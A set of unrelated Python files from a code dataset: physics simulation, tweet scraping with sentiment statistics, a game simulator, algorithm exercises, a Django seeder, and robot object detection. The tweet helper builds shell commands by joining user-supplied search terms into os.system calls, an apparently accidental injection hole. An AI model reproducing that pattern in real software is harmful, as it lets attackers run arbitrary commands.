sparse_linalg\nimport sys\nfile_dir = '/localhome/pykb/physics_code/Exact_Diagonalization/Classes/'\nsys.path.append(file_dir)\nfile_dir = '/localhome/pykb/physics_code/Exact_Diagonalization/functions/'\nsys.path.append(file_dir)\n\nfrom Hamiltonian_Classes import Hamiltonian,H_table,clock_Hamiltonian,spin_Hamiltonian\nfrom System_Classes import unlocking_System,U1_system\nfrom Symmetry_Classes import translational,parity,model_sym_data,charge_conjugation\n# from Plotting_Classes import eig_overlap,fidelity,entropy,energy_basis\nfrom Non_observables import zm\nfrom Construction_functions import bin_to_int_base_m,int_to_bin_base_m,cycle_bits_state\nfrom Search_functions import find_index_bisection\nfrom State_Classes import zm_state,sym_state,prod_state,bin_state,ref_state\nfrom rw_functions import save_obj,load_obj\nfrom Calculations import level_stats,fidelity,eig_overlap,entropy,site_precession,site_projection,time_evolve_state\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# matplotlib.rcParams['figure.dpi'] = 400\n\ndef spin_chain_tb_H(L):\n S=L/2\n m=np.arange(-S,S)\n couplings = np.power(S*(S+1)-m*(m+1),0.5)\n return np.diag(couplings,1) + np.diag(couplings,-1)\n\nL=15\nd=3\n\n#generate necessary spin chain H\nbridge_cube_H = spin_chain_tb_H(L-2)\nmain_cube = spin_chain_tb_H(L)\nbridge_dim = int(np.size(bridge_cube_H,axis=0))\nmain_dim = int(np.size(main_cube,axis=0))\n\n# #build block diagonal matrix, keep pair of indices for coupled sites + there coupling value\ndim_total = 2*main_dim-1\ndim_total = dim_total + (L+1-3)*(bridge_dim-2)\nH=np.zeros((dim_total,dim_total))\n\n# #two largest cubes coupled at pol\nH_two_cubes = np.zeros((2*main_dim-1,2*main_dim-1))\nH_two_cubes[:main_dim,:main_dim] = main_cube\nH_two_cubes[main_dim-1:,main_dim-1:] = main_cube\n\nH[:np.size(H_two_cubes,axis=0),:np.size(H_two_cubes,axis=0)] = H_two_cubes\n\n# get loc of start/end states of cube bridges\nbridge_pos = np.zeros((L+1-3,2),dtype=int)\nfor n in range(2,L):\n bridge_pos[n-2,0] = n\n bridge_pos[n-2,1] = n+L-1\nprint(bridge_pos)\n\ncurrent_index = np.size(H_two_cubes,axis=0)\nblock_H = np.copy(bridge_cube_H)\n\nplt.matshow(H)\nplt.show()\n\n# insert cube bridges, with last two couplings being at bridge pos\nblock_H = np.copy(bridge_cube_H)\nedge_coupling = bridge_cube_H[0,1]\n#trim first couplings (insert by hand with loc on main cube)\nblock_H = np.delete(block_H,np.size(block_H,axis=0)-1,axis=0)\nblock_H = np.delete(block_H,np.size(block_H,axis=1)-1,axis=1)\nblock_H = np.delete(block_H,0,axis=0)\nblock_H = np.delete(block_H,0,axis=1)\ndim = np.size(block_H,axis=0)\n\nfor n in range(0,np.size(bridge_pos,axis=0)):\n H[current_index:current_index+dim,current_index:current_index+dim] = block_H\n\n H[current_index,bridge_pos[n,0]] = edge_coupling\n H[bridge_pos[n,0],current_index] = edge_coupling\n\n right_edge_index = current_index + dim -1\n\n H[right_edge_index,bridge_pos[n,1]] = edge_coupling\n H[bridge_pos[n,1],right_edge_index] = edge_coupling\n\n current_index = current_index + dim\n\nplt.matshow(H)\nplt.show()\nprint(\"Dim=\"+str(dim_total))\ne,u = np.linalg.eigh(H)\nprint(\"Found eig\")\n\nt=np.arange(0,20,0.01)\npsi_energy = np.conj(u[0,:])\nf=np.zeros(np.size(t))\nfor n in range(0,np.size(t,axis=0)):\n evolved_state = time_evolve_state(psi_energy,e,t[n])\n f[n] = np.abs(np.vdot(evolved_state,psi_energy))**2\nplt.plot(t,f)\nplt.xlabel(r\"$t$\")\nplt.ylabel(r\"$\\vert \\langle 0_L \\vert e^{-iHt} \\vert 0_L \\rangle \\vert^2$\")\nplt.title(r\"$\\textrm{Cube Bridges Phenemological model, Unequal bridge length}$, L=\"+str(L)+\", d=\"+str(d))\nplt.show()\n","sub_path":"projects/embedded_cube_phen_models/cube_bridge_phen_model_pxp_bridges.py","file_name":"cube_bridge_phen_model_pxp_bridges.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"403149948","text":"import os\nimport datetime, time, json, csv, jsonify, subprocess\nfrom collections import Counter\n\ndef buscarTweets(busqueda='',hashtag='',usuario='', fecha_min='', cerca=''):\n path_script = os.path.abspath(\"Exporter.py\")\n fecha=datetime.datetime.now()\n year=fecha.year\n month=fecha.month\n day=fecha.day\n hashtag=hashtag.replace(\"#\",\"\").replace(\" \",\"\")\n filename=''\n if(fecha_min==''):\n f1=\"\"+str(year)+\"-\"+str(month)+\"-\"+str(day)\n else:\n f1=fecha_min.replace('/','-')\n f2=\"\"+str(year)+\"-\"+str(month-1)+\"-\"+str(day)\n if(cerca==''):\n cercania='global'\n else:\n cercania=cerca\n if(busqueda is not ''):\n if(hashtag is not ''):\n filename=busqueda.replace(\" \",\"\")+hashtag.replace(\"#\",\"\").replace(\" \",\"\")\n busqueda=busqueda.replace(\" \",\"\")+\" \"+hashtag.replace(\"#\",\"\").replace(\" \",\"\")\n os.system(\"python3 \"+path_script+\" --querysearch '\"+busqueda+\"'\"+\" --near \"+cercania+\" --lang es\")\n elif(hashtag is ''):\n filename=busqueda.replace(\" \",\"\")\n os.system(\"python3 \"+path_script+\" --querysearch '\"+busqueda+\"'\"+\" --near \"+cercania+\" --lang es\")\n elif(busqueda is ''):\n if(hashtag is not ''):\n filename=hashtag.replace(' ','').replace(\"#\",\"\")\n os.system(\"python3 \"+path_script+\" --querysearch '\"+hashtag+\"'\"+\" --near \"+cercania+\" --lang es\")\n elif(hashtag is ''):\n if(usuario is not ''):\n filename=usuario.replace(' ','').replace('@','')\n os.system(\"python3 \"+path_script+\" --username '\"+usuario.replace('@','')+\"'\"+\" --near \"+cercania+\" --lang es\")\n else:\n os.system(\"python3 \"+path_script+\" --since \"+str(f2)+\" --until \"+str(f1)+\" --near \"+cercania+\" --lang es\")\n return filename\n\ndef datosGrafica(filename='output_got'):\n archivo=''\n if('.csv' in filename):\n archivo=filename\n else:\n archivo=filename+'.csv'\n valoraciones=[]\n retweets=[]\n favoritos=[]\n hashtags=[]\n menciones=[]\n textos=[]\n with open(archivo,\"rt\") as csv_file:\n reader=csv.reader(csv_file, delimiter=';',skipinitialspace=True)\n for line in reader:\n try:\n valoraciones.append(line[10])\n retweets.append(int(line[2]))\n favoritos.append(int(line[3]))\n hashtags.append(line[7])\n menciones.append(line[6])\n textos.append(line[4])\n except:\n continue\n muy_positivo=0\n muy_negativo=0\n tendencia_n=0\n tendencia_p=0\n mayor_rt=max(retweets)\n promedio_rt= sum(retweets) / len(retweets)\n mayor_fv=max(favoritos)\n promedio_fv= sum(favoritos) / len(favoritos)\n texto_rt=textos[retweets.index(mayor_rt)]\n texto_fv=textos[favoritos.index(mayor_fv)]\n rt_positivos=[]\n rt_tend_pos=[]\n rt_tend_neg=[]\n rt_negativos=[]\n fv_positivos=[]\n fv_tend_pos=[]\n fv_tend_neg=[]\n fv_negativos=[]\n p=0\n for i in valoraciones:\n try:\n if(\"Muy positivo\" in i):\n muy_positivo=muy_positivo+1\n rt_positivos.append(retweets[p])\n fv_positivos.append(favoritos[p])\n elif(\"Muy negativo\" in i):\n muy_negativo=muy_negativo+1\n rt_negativos.append(retweets[p])\n fv_negativos.append(favoritos[p])\n elif(\"Tendencia positiva\" in i):\n tendencia_p=tendencia_p+1\n rt_tend_pos.append(retweets[p])\n fv_tend_pos.append(favoritos[p])\n elif(\"Tendencia negativa\" in i):\n tendencia_n=tendencia_n+1\n rt_tend_neg.append(retweets[p])\n fv_tend_neg.append(favoritos[p])\n except:\n continue\n p += 1\n hpopulares=[word for word, word_count in Counter(hashtags).most_common(4)]\n mpopulares=[word for word, word_count in Counter(menciones).most_common(4)]\n if not rt_positivos:\n rt_positivos.append(0)\n if not rt_negativos:\n rt_negativos.append(0)\n if not rt_tend_pos:\n rt_tend_pos.append(0)\n if not rt_tend_neg:\n rt_tend_neg.append(0)\n if not fv_positivos:\n fv_positivos.append(0)\n if not fv_negativos:\n fv_negativos.append(0)\n if not fv_tend_pos:\n fv_tend_pos.append(0)\n if not fv_tend_neg:\n fv_tend_neg.append(0)\n maxRtPos=max(rt_positivos)\n maxRtNeg=max(rt_negativos)\n maxRtTPos=max(rt_tend_pos)\n maxRtTNeg=max(rt_tend_neg)\n maxFvPos=max(fv_positivos)\n maxFvNeg=max(fv_negativos)\n maxFvTPos=max(fv_tend_pos)\n maxFvTNeg=max(fv_tend_neg)\n a={'Muy positivo':muy_positivo, 'Tendencia positiva':tendencia_p, 'Tendencia negativa':tendencia_n, 'Muy negativo':muy_negativo,\n 'Maximo RT Muy positivo': maxRtPos,'Maximo Rt Tendencia Positiva': maxRtTPos, 'Maximo Rt Tendencia Negativa':maxRtTNeg, \n 'Maximo Rt Muy negativos': maxRtNeg,'Tweet mas Rt':texto_rt, 'Promedio RT': float(promedio_rt), 'Mayor Favorito Muy Positivo':maxFvPos, \n 'Mayor Favorito Tendencia positiva': maxFvTPos, 'Mayor Favorito Tendencia Negativa': maxFvTNeg, 'Mayor Favorito Muy Negativo': maxFvNeg,\n 'Tweet mas Fv':texto_fv, 'Promedio Favorito':float(promedio_fv), 'Hashtags populares':hpopulares, 'Menciones populares':mpopulares}\n resultado=json.dumps(a)\n print(resultado)\n return resultado","sub_path":"GetOldTweets-python/pruebasistema.py","file_name":"pruebasistema.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"89564759","text":"from core.advbase import *\nfrom module.template import RngCritAdv\n\ndef module():\n return Mikoto\n\nclass Mikoto(RngCritAdv):\n conf = {}\n conf['slots.a'] = ['Resounding_Rendition', 'The_Fires_of_Hate']\n conf['slots.burn.a'] = ['Resounding_Rendition', 'Me_and_My_Bestie']\n conf['acl'] = \"\"\"\n `dragon, s=2 \n queue prep\n `s2;s4;s1\n end\n `s3, not buff(s3)\n `s4\n `s1, cancel\n `s2, x=5\n \"\"\"\n conf['coabs'] = ['Halloween_Mym', 'Dagger', 'Marth']\n conf['share'] = ['Kleimann']\n\n def prerun(self):\n self.config_rngcrit(cd=15, ev=20)\n self.a1_stack = 0\n\n def charge(self, name, sp, target=None):\n sp_s1 = self.sp_convert(self.sp_mod(name) + 0.1*self.a1_stack, sp)\n sp = self.sp_convert(self.sp_mod(name), sp)\n targets = self.get_targets(target)\n if not targets:\n return\n for s in targets:\n if s == self.s1:\n s.charge(sp_s1)\n else:\n s.charge(sp)\n self.think_pin('sp')\n log('sp', name if not target else f'{name}_{target}', sp, ', '.join([f'{s.charged}/{s.sp}' for s in self.skills]))\n\n def rngcrit_cb(self, mrate=None):\n self.a1_stack = mrate\n\n @property\n def buffcount(self):\n buffcount = super().buffcount\n return buffcount + self.a1_stack\n\nif __name__ == '__main__':\n from core.simulate import test_with_argv\n test_with_argv(None, *sys.argv)\n","sub_path":"adv/mikoto.py","file_name":"mikoto.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"573352345","text":"def eh_crescente (lista):\n crescente = True\n i = 0\n c = 0\n while i+1 MIN_CONF_THRESH) and (scores[i] <= 1.0)):\n\n # Get bounding box coordinates and draw box\n # Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()\n ymin = int(max(1,(boxes[i][0] * imH)))\n xmin = int(max(1,(boxes[i][1] * imW)))\n ymax = int(min(imH,(boxes[i][2] * imH)))\n xmax = int(min(imW,(boxes[i][3] * imW)))\n\n # Draw label\n object_name = labels[int(classes[i])] # Look up object name from \"labels\" array using class index\n mapping[0] = sd.getBoolean(\"mapping\", False)\n # Example: 'person: 72%'\n if (mapping[0] == False):\n #Coordinate sending\n if (object_name == 'KitKat') :\n KitKatx = ((xmax + xmin) / 2) - 320\n KitKaty = 240 - ((ymax + ymin) / 2)\n KitKatall = KitKatall+[object_name]\n KitKatdist = int(math.sqrt(KitKatx**2+KitKaty**2))\n kitkatcord= kitkatcord+[[KitKatx,KitKaty, KitKatdist]]\n kkmin = min(kitkatcord,key = lambda x: x[2])\n kkx=kkmin[0]\n kky=kkmin[1]\n kkd=kkmin[2]\n sd.putNumber(\"KitKatx\",kkx)\n sd.putNumber(\"KitKaty\",kky)\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), KitKatx, KitKaty)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'KitKat Coordinates : ' + str(kkmin[0:2]),(15,85),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n \n elif (object_name == 'Ball'):\n Ballx = ((xmax + xmin) / 2) - 320\n Bally = 240 - ((ymax + ymin) / 2)\n Ballall = Ballall+[object_name]\n Balldist = int(math.sqrt(Ballx**2+Bally**2))\n ballcord= ballcord+[[Ballx,Bally, Balldist]]\n bmin = min(ballcord,key = lambda x: x[2])\n bx=bmin[0]\n by=bmin[1]\n bd=bmin[2]\n sd.putNumber(\"Ballx\",bx )\n sd.putNumber(\"Bally\",by)\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), Ballx, Bally)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Ball Coordinates : ' + str(bmin[0:2]),(15,105),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n\n elif (object_name == 'Nissin'):\n Nissinx = ((xmax + xmin) / 2) - 320\n Nissiny = 240 - ((ymax + ymin) / 2)\n Nissinall = Nissinall+[object_name]\n Nissindist = int(math.sqrt(Nissinx**2+Nissiny**2))\n nissincord= nissincord+[[Nissinx,Nissiny,Nissindist]]\n nmin = min(nissincord,key = lambda x: x[2])\n nx=nmin[0]\n ny=nmin[1]\n nd=nmin[2]\n sd.putNumber(\"Nissinx\",nx )\n sd.putNumber(\"Nissiny\",ny )\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), Nissinx, Nissiny)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Nissin Coordinates : ' + str(nmin[0:2]),(15,125),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n\n elif (object_name == 'Chips') :\n Chipsx = ((xmax + xmin) / 2) - 320\n Chipsy = 240 - ((ymax + ymin) / 2)\n Chipsall = Chipsall+[object_name]\n Chipsdist = int(math.sqrt(Chipsx**2+ Chipsy**2))\n chipcord= chipcord+[[Chipsx, Chipsy, Chipsdist]]\n cmin = min(chipcord,key = lambda x: x[2])\n cx=cmin[0]\n cy=cmin[1]\n cd=cmin[2]\n sd.putNumber(\"Chipsx\",cx )\n sd.putNumber(\"Chipsy\",cy)\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), Chipsx, Chipsy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Chips Coordinates : ' + str(cmin[0:2]),(15,145),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n \n current_count+=1\n\n\n elif (mapping[0] == True):\n \n if (object_name == 'GreenBox'):\n GreenBoxx = ((xmax + xmin) / 2) - 320\n GreenBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"GreenBoxx\", GreenBoxx)\n sd.putNumber(\"GreenBoxy\", GreenBoxy)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), GreenBoxx, GreenBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.putText(frame, 'GreenBox Coordinates : ' + str(GreenBoxx) + ',' + str(GreenBoxy),(15,165),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(GreenBoxx)+320,240-int(GreenBoxy)),(255,255,0),2)\n \n elif (object_name == 'YellowBox'):\n YellowBoxx = ((xmax + xmin) / 2) - 320\n YellowBoxy = 240 - ((ymax + ymin) / 2)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), YellowBoxx, YellowBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'YellowBox Coordinates : ' + str(YellowBoxx) + ',' + str(YellowBoxy),(15,185),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n sd.putNumber(\"YellowBoxx\", YellowBoxx)\n sd.putNumber(\"YellowBoxy\", YellowBoxy)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(YellowBoxx)+320,240-int(YellowBoxy)),(255,255,0),2)\n \n elif (object_name == 'RedBox'):\n RedBoxx = ((xmax + xmin) / 2) - 320\n RedBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"RedBoxx\", RedBoxx)\n sd.putNumber(\"RedBoxy\", RedBoxy)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), RedBoxx, RedBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'RedBox Coordinates : ' + str(RedBoxx) + ',' + str(RedBoxy),(15,205),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(RedBoxx)+320,240-int(RedBoxy)),(255,255,0),2)\n \n elif (object_name == 'BlackBox'):\n BlackBoxx = ((xmax + xmin) / 2) - 320\n BlackBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"BlackBoxx\", BlackBoxx)\n sd.putNumber(\"BlackBoxy\", BlackBoxy) \n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), BlackBoxx, BlackBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'BlackBox Coordinates : ' + str(BlackBoxx) + ',' + str(BlackBoxy),(15,225),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(BlackBoxx)+320,240-int(BlackBoxy)),(255,255,0),2)\n \n elif (object_name == 'BlueBox'):\n BlueBoxx = ((xmax + xmin) / 2) - 320\n BlueBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"BlueBoxx\", BlueBoxx)\n sd.putNumber(\"BlueBoxy\", BlueBoxy)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), BlueBoxx, BlueBoxy) \n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 1) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'BlueBox Coordinates : ' + str(BlueBoxx) + ',' + str(BlueBoxy),(15,245),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(BlueBoxx)+320,240-int(BlueBoxy)),(255,255,0),2)\n\n elif (object_name == 'Bin'):\n Binx = ((xmax + xmin) / 2) - 320\n Biny = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"Binx\", Binx)\n sd.putNumber(\"Biny\", Biny)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), Binx, Biny) \n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 1) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Bin Coordinates : ' + str(Binx) + ',' + str(Biny),(15,265),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(Binx)+320,240-int(Biny)),(255,255,0),2)\n \n current_count+=1\n \n\n cv2.circle(frame,(320,240),5,(255,255,0),cv2.FILLED)\n cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(15,25),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,55),2,cv2.LINE_AA)\n cv2.putText (frame,'Total Detection Count : ' + str(current_count),(15,65),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,55),2,cv2.LINE_AA)\n \n\n # All the results have been drawn on the frame, so it's time to display it.\n cv2.imshow('Object Detector', frame)\n\n # Calculate framerate\n t2 = cv2.getTickCount()\n time1 = (t2-t1)/freq\n frame_rate_calc= 1/time1\n \n # Press 'q' to quit\n if cv2.waitKey(1) == ord('q'):\n break\n\n# Clean up\ncv2.destroyAllWindows()\nvideostream.stop()\nprint(\"Done\")\n\n\n","sub_path":"vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":24174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"198570350","text":"\"\"\"\nBellmanFord\n\"\"\"\n\nINF = 10 ** 20\n\nv_num, e_num, r = map(int, input().split())\ndist_lst = [INF for _ in range(v_num)]\nedges_lst = [[] for _ in range(e_num)]\nnegative_cycle_flag = False\n\nfor _ in range(e_num):\n s, t, dist = map(int, input().split())\n edges_lst[s].append((dist, t))\n\ndist_lst[r] = 0\n\nif e_num != 0:\n for _ in range(v_num):\n for v in range(v_num):\n if dist_lst[v] != INF:\n for dist, to in edges_lst[v]:\n if dist_lst[v] + dist < dist_lst[to]:\n dist_lst[to] = dist_lst[v] + dist\n \n for v in range(v_num):\n if dist_lst[v] != INF:\n for dist, to in edges_lst[v]:\n if dist_lst[v] + dist < dist_lst[to]:\n negative_cycle_flag = True\n\nif negative_cycle_flag:\n print(\"NEGATIVE CYCLE\")\nelse:\n for dist in dist_lst:\n if dist == INF:\n print(\"INF\")\n else:\n print(dist)\n","sub_path":"GRL/GRL_1_B.py","file_name":"GRL_1_B.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"386271897","text":"import random\n\nfrom django.core.management.base import BaseCommand\nfrom django_seed import Seed\nfrom users.models import User\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"--number\", default=1, type=int,\n help=\"How many users do you want to create??\")\n\n def handle(self, *args, **options):\n number = int(options.get(\"number\", 1))\n seeder = Seed.seeder()\n seeder.add_entity(User, number, {\n \"username\": lambda x: seeder.faker.name(),\n \"first_name\": lambda x: seeder.faker.first_name(),\n \"last_name\": lambda x: seeder.faker.last_name(),\n \"email\": lambda x: seeder.faker.email(),\n \"gender\": lambda x: random.choice(User.GENDER_CHOICES)[0],\n \"profile_img\": lambda x: f\"profile_img/test/tux{random.randint(1, 5)}.jpg\",\n \"bio\": lambda x: seeder.faker.paragraph(nb_sentences=3, variable_nb_sentences=True, ext_word_list=None),\n \"birthdate\": lambda x: seeder.faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=115),\n })\n\n all_users = User.objects.all()\n inserted_pk = seeder.execute()\n for pk in inserted_pk[User]:\n user = User.objects.get(pk=pk)\n for _ in range(random.randint(5, 10)):\n random.choice(all_users)\n user.friends.add(random.choice(all_users))\n for _ in range(random.randint(1, 5)):\n user.friend_requests.add(random.choice(all_users))\n self.stdout.write(self.style.SUCCESS(f\"{number} user created!!!\"))\n","sub_path":"users/management/commands/seed_users.py","file_name":"seed_users.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"637843057","text":"import pandas as pd\nimport numpy as np\nimport os.path\n\n\n# Change printout width in console for better readability when printing data frame\ndef clean_window():\n desired_width = 320\n pd.set_option('display.width', desired_width)\n np.set_printoptions(linewidth=desired_width)\n pd.set_option('display.max_columns', 10)\n\n\n# Returns true if all 6 prediction models exist\ndef models_exist(file1, file2, file3, file4, file5, file6):\n files = file1, file2, file3, file4, file5, file6\n for file_num in files:\n if os.path.exists(file_num) == False:\n return False\n return True\n\n\n# Function used to circularize data\ndef date_cyc_enc(df, col, max_vals):\n df[col + '_sin'] = np.sin(2 * np.pi * df[col]/max_vals)\n df[col + '_cos'] = np.cos(2 * np.pi * df[col]/max_vals)\n return 